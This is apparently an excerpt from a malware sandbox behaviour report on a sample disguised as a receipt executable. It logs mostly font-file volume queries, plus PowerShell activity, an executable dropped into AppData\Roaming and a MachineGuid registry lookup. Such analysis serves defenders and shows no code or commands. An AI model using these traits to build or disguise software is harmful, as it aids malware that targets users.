            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Queries volume information: C:\Users\user\Desktop\Receipt-#202431029B.exe VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeQueries volume information: C:\Users\user\AppData\Roaming\XetHVID.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeQueries volume information: C:\Users\user\AppData\Roaming\XetHVID.exe VolumeInformation
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
